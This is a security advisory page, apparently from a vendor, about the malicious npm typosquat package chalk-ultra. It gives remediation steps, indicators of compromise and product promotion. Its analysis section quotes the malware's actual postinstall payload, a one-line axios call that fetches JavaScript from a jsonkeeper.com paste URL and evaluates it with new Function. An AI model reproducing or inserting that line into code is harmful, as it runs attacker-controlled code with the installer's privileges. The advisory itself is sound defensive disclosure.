Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

chalk-ultranpm

Malicious code in chalk-ultra (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6300
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall chalk-ultra

What this malware does

chalk-ultra is published under a name that mimics the widely-used chalk package, but its main is a verbatim copy of nodemailer source and its package.json declares "postinstall": "node lib/utils/index.js". The postinstall path detaches into lib/utils/smtp-connection/index.js, which executes require("axios").get("https://jsonkeeper.com/b/OMNQZ").then(r=>new Function("require",r.data.cookie)(require)) — fetching JavaScript from a public, mutable paste host and evaluating it via new Function with the installer's require and full process privileges at install time. A sibling file lib/utils/smtp-connection/parse.js exports an AES-256-CBC decryption helper with a hardcoded key (1c7631ac...0566) and IV (cf17723e...39d6), pre-staged to decode encrypted strings handed back by the remote second-stage payload. Any developer running npm install chalk-ultra executes whatever JavaScript the attacker is currently hosting at the jsonkeeper.com URL, with the installer's network access, environment variables, credentials, and filesystem.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

3 flagged
12.0.312.0.1412.0.15

Indicators of compromise (SHA-256)

39ebe5fd7afb21b20fa3a36fb3fc79d3311c1a87b9c0b0f12e60e2edbf0128b6
9a219b45c3fdcdb883eeb2c7e74d20060af2c788865e7925f911e40276dcd631
c20d1eeea12e261f5fe48b185aebc47d8918cc723ba8031202a5df8595f30cc5
89b8d71f76034393365529e64ecc504e74681ced32fcd6d4741ae2633c1c4cc1

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for chalk-ultra (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging chalk-ultra across your stack and pipelines.

  2. If you installed it — respond

    chalk-ultra is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If chalk-ultra was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks chalk-ultra before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. chalk-ultra on npm has been identified as a malicious package (versions 12.0.3, 12.0.14, 12.0.15 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007247IN-MAL-2026-007249IN-MAL-2026-007248GHSA-vgq4-6c53-5826

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks chalk-ultra-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.